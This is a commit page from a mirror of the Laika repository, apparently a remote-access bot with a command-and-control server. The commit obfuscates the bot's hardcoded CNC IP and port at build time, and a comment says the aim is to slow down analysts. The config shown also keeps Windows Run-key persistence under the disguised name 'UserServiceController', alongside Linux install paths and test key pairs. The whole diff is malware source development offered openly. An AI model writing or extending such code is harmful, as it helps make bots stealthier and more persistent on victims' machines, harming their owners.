CPunch/Laika
1
0
Fork 0
mirror of https://github.com/CPunch/Laika.git synced 2024-11-21 12:40:04 +00:00
Code Issues Projects Releases Wiki Activity

VMBoxGen refactor, obfuscate static CNC ip & port strings

Browse Source 
- VMBoxGen is built before shared lib
- VMBoxGen has no reliance on the shared lib, just the config file
- main config was moved to the root cmakelists
This commit is contained in:
CPunch 2022-05-19 01:42:40 -05:00
parent 8afaa4d157
commit 5aecc1b63f
11 changed files with 56 additions and 42 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

2
.gitmodules vendored
View File

@ -1,3 +1,3 @@
[submodule "cmake-modules/libsodium"] [submodule "cmake-modules/libsodium"]
path = lib/libsodium path = libsodium
url = https://github.com/robinlinden/libsodium-cmake.git url = https://github.com/robinlinden/libsodium-cmake.git

34
CMakeLists.txt
View File

@ -54,6 +54,40 @@ endif ()
set(SODIUM_DISABLE_TESTS ON) set(SODIUM_DISABLE_TESTS ON)
set(SODIUM_MINIMAL ON) set(SODIUM_MINIMAL ON)
set(SODIUM_STATIC ON) set(SODIUM_STATIC ON)
add_subdirectory(libsodium)
# ========================================== [[ CONFIG DEFAULTS ]] ==========================================
set(LAIKA_VMBOXCONFIG ${CMAKE_SOURCE_DIR}/lib/include/lboxconfig.h)
# DO NOT USE THESE KEYS, TESTING ONLY (TODO: make vmboxgen auto gen these)
if(NOT LAIKA_PUBKEY)
set(LAIKA_PUBKEY "40d5534aca77d1f5ec2bbe79dd9d0f52a78148918f95814404cefe97c34c5c27")
endif ()
if(NOT LAIKA_PRIVKEY)
set(LAIKA_PRIVKEY "90305aa77023d1c1e03265c3b6af046eb58d6ec8ba650b0dffed01379feab8cc")
endif ()
if(NOT LAIKA_CNC_IP)
set(LAIKA_CNC_IP "127.0.0.1")
endif ()
if(NOT LAIKA_CNC_PORT)
set(LAIKA_CNC_PORT "13337")
endif ()
# version details
set(LAIKA_VERSION_MAJOR 0)
set(LAIKA_VERSION_MINOR 3)
message(STATUS "Building config file...")
configure_file(${CMAKE_SOURCE_DIR}/lib/include/lconfig.h.in ${CMAKE_SOURCE_DIR}/lib/include/lconfig.h)
# config vm boxes
add_subdirectory(tools/vmboxgen)
# =========================================== [[ BUILD TOOLING ]] ===========================================
# compile laikalib, tools, cnc & bot # compile laikalib, tools, cnc & bot
add_subdirectory(lib) add_subdirectory(lib)

3
USAGE.md Normal file
View File

@ -0,0 +1,3 @@
# Laika Build Process
Laika has a specific setup process that need some explanation. Before

8
bot/src/main.c
View File

@ -1,5 +1,6 @@
#include <stdio.h> #include <stdio.h>
#include "lbox.h"
#include "lconfig.h" #include "lconfig.h"
#include "lerror.h" #include "lerror.h"
#include "ltask.h" #include "ltask.h"
@ -12,6 +13,10 @@
#else #else
int main() { int main() {
#endif #endif
/* these boxes are really easy to dump, they're unlocked at the very start of execution and left in memory the entire time.
not only that but they're only obfuscating the ip & port, both are things anyone would see from opening wireshark */
LAIKA_BOX_SKID_START(char*, cncIP, LAIKA_CNC_IP);
LAIKA_BOX_SKID_START(char*, cncPORT, LAIKA_CNC_PORT);
struct sLaika_bot *bot; struct sLaika_bot *bot;
#ifdef LAIKA_PERSISTENCE #ifdef LAIKA_PERSISTENCE
@ -25,7 +30,7 @@
LAIKA_TRY LAIKA_TRY
/* connect to test CNC */ /* connect to test CNC */
laikaB_connectToCNC(bot, LAIKA_CNC_IP, LAIKA_CNC_PORT); laikaB_connectToCNC(bot, cncIP, cncPORT);
/* while connection is still alive, poll bot */ /* while connection is still alive, poll bot */
while (laikaS_isAlive((&bot->peer->sock))) { while (laikaS_isAlive((&bot->peer->sock))) {
@ -46,5 +51,6 @@
laikaB_unmarkRunning(); laikaB_unmarkRunning();
#endif #endif
/* vm boxes are left opened */
return 0; return 0;
} }

31
lib/CMakeLists.txt
View File

@ -2,42 +2,11 @@ cmake_minimum_required(VERSION 3.16)
set(LIB_INCLUDEDIR ${CMAKE_CURRENT_SOURCE_DIR}/include) set(LIB_INCLUDEDIR ${CMAKE_CURRENT_SOURCE_DIR}/include)
# DO NOT USE THESE KEYS, TESTING ONLY
if(NOT LAIKA_PUBKEY)
set(LAIKA_PUBKEY "40d5534aca77d1f5ec2bbe79dd9d0f52a78148918f95814404cefe97c34c5c27")
endif ()
if(NOT LAIKA_PRIVKEY)
set(LAIKA_PRIVKEY "90305aa77023d1c1e03265c3b6af046eb58d6ec8ba650b0dffed01379feab8cc")
endif ()
if(NOT LAIKA_CNC_IP)
set(LAIKA_CNC_IP "127.0.0.1")
endif ()
if(NOT LAIKA_CNC_PORT)
set(LAIKA_CNC_PORT "13337")
endif ()
# version details
set(LAIKA_VERSION_MAJOR 0)
set(LAIKA_VERSION_MINOR 2)
set(SODIUM_DISABLE_TESTS ON)
# vmbox config location
set(LAIKA_VMBOXCONFIG ${LIB_INCLUDEDIR}/lboxconfig.h PARENT_SCOPE)
project(LaikaLib VERSION ${LAIKA_VERSION_MAJOR}.${LAIKA_VERSION_MINOR}) project(LaikaLib VERSION ${LAIKA_VERSION_MAJOR}.${LAIKA_VERSION_MINOR})
message(STATUS "Building config file...")
configure_file(${LIB_INCLUDEDIR}/lconfig.h.in ${LIB_INCLUDEDIR}/lconfig.h)
# Put CMake targets (ALL_BUILD/ZERO_CHECK) into a folder # Put CMake targets (ALL_BUILD/ZERO_CHECK) into a folder
set_property(GLOBAL PROPERTY USE_FOLDERS ON) set_property(GLOBAL PROPERTY USE_FOLDERS ON)
# include libsodium
add_subdirectory(libsodium)
# compile LaikaLib library # compile LaikaLib library
file(GLOB_RECURSE LIBSOURCE ${CMAKE_CURRENT_SOURCE_DIR}/src/**.c ${CMAKE_CURRENT_SOURCE_DIR}/vendor/**.c) file(GLOB_RECURSE LIBSOURCE ${CMAKE_CURRENT_SOURCE_DIR}/src/**.c ${CMAKE_CURRENT_SOURCE_DIR}/vendor/**.c)
file(GLOB_RECURSE LIBHEADERS ${CMAKE_CURRENT_SOURCE_DIR}/include/**.h) file(GLOB_RECURSE LIBHEADERS ${CMAKE_CURRENT_SOURCE_DIR}/include/**.h)

2
lib/include/lconfig.h.in
View File

@ -44,4 +44,6 @@
#define LAIKA_WIN_REG_KEY "Software\\Microsoft\\Windows\\CurrentVersion\\Run" #define LAIKA_WIN_REG_KEY "Software\\Microsoft\\Windows\\CurrentVersion\\Run"
#define LAIKA_WIN_REG_VAL "UserServiceController" #define LAIKA_WIN_REG_VAL "UserServiceController"
#define LAIKA_VM_CODESIZE 512
#endif #endif

1
lib/include/lvm.h
View File

@ -14,7 +14,6 @@
#include "laika.h" #include "laika.h"
#include "lerror.h" #include "lerror.h"
#define LAIKA_VM_CODESIZE 512
#define LAIKA_VM_STACKSIZE 64 #define LAIKA_VM_STACKSIZE 64
#define LAIKA_VM_CONSTSIZE 32 #define LAIKA_VM_CONSTSIZE 32

0
lib/libsodium → libsodium
View File

1
tools/CMakeLists.txt
View File

@ -1,5 +1,4 @@
cmake_minimum_required(VERSION 3.16) cmake_minimum_required(VERSION 3.16)
add_subdirectory(vmboxgen)
add_subdirectory(genkey) add_subdirectory(genkey)
add_subdirectory(vmtest) add_subdirectory(vmtest)

5
tools/vmboxgen/CMakeLists.txt
View File

@ -8,7 +8,7 @@ set_property(GLOBAL PROPERTY USE_FOLDERS ON)
# compile vmTest # compile vmTest
file(GLOB_RECURSE VMTESTSOURCE ${CMAKE_CURRENT_SOURCE_DIR}/src/**.c) file(GLOB_RECURSE VMTESTSOURCE ${CMAKE_CURRENT_SOURCE_DIR}/src/**.c)
add_executable(VMBoxGen ${VMTESTSOURCE}) add_executable(VMBoxGen ${VMTESTSOURCE})
target_link_libraries(VMBoxGen PUBLIC LaikaLib) target_link_libraries(VMBoxGen PUBLIC)
# add the 'DEBUG' preprocessor definition if we're compiling as Debug # add the 'DEBUG' preprocessor definition if we're compiling as Debug
target_compile_definitions(VMBoxGen PUBLIC "$<$<CONFIG:Debug>:DEBUG>") target_compile_definitions(VMBoxGen PUBLIC "$<$<CONFIG:Debug>:DEBUG>")
@ -16,8 +16,7 @@ target_compile_definitions(VMBoxGen PUBLIC "$<$<CONFIG:Debug>:DEBUG>")
# generate the VMBOXCONFIG file # generate the VMBOXCONFIG file
if(LAIKA_OBFUSCATE) if(LAIKA_OBFUSCATE)
add_custom_command(TARGET VMBoxGen POST_BUILD add_custom_command(TARGET VMBoxGen POST_BUILD
DEPENDS VMBoxGen
COMMAND VMBoxGen ${LAIKA_VMBOXCONFIG} COMMAND VMBoxGen ${LAIKA_VMBOXCONFIG}
COMMENT "Generating VMBox data & keys..." COMMENT "Generating VMBox data & keys.."
) )
endif () endif ()

11
tools/vmboxgen/src/main.c
View File

@ -1,12 +1,10 @@
#include <stdio.h> #include <stdio.h>
#include <stdlib.h> #include <stdlib.h>
#include <string.h>
#include <time.h> #include <time.h>
#include <inttypes.h> #include <inttypes.h>
#include "lmem.h" #include "lconfig.h"
#include "lvm.h"
#include "lbox.h"
#include "lsodium.h"
#define ERR(...) do { printf(__VA_ARGS__); exit(EXIT_FAILURE); } while(0); #define ERR(...) do { printf(__VA_ARGS__); exit(EXIT_FAILURE); } while(0);
#define RANDBYTE (rand() % UINT8_MAX) #define RANDBYTE (rand() % UINT8_MAX)
@ -73,6 +71,9 @@ int main(int argv, char **argc) {
srand(time(NULL)); /* really doesn't need to be cryptographically secure, the point is only to slow them down */ srand(time(NULL)); /* really doesn't need to be cryptographically secure, the point is only to slow them down */
fprintf(out, PREAMBLE); fprintf(out, PREAMBLE);
/* shared */
MAKESKIDDATA(LAIKA_CNC_IP);
MAKESKIDDATA(LAIKA_CNC_PORT);
/* linux */ /* linux */
MAKESKIDDATA(LAIKA_LIN_LOCK_FILE); MAKESKIDDATA(LAIKA_LIN_LOCK_FILE);
MAKESKIDDATA(LAIKA_LIN_INSTALL_DIR); MAKESKIDDATA(LAIKA_LIN_INSTALL_DIR);
@ -86,6 +87,8 @@ int main(int argv, char **argc) {
MAKESKIDDATA(LAIKA_WIN_REG_VAL); MAKESKIDDATA(LAIKA_WIN_REG_VAL);
fprintf(out, POSTAMBLE); fprintf(out, POSTAMBLE);
fclose(out); fclose(out);
printf("Wrote %s\n", argc[1]);
return 0; return 0;
} }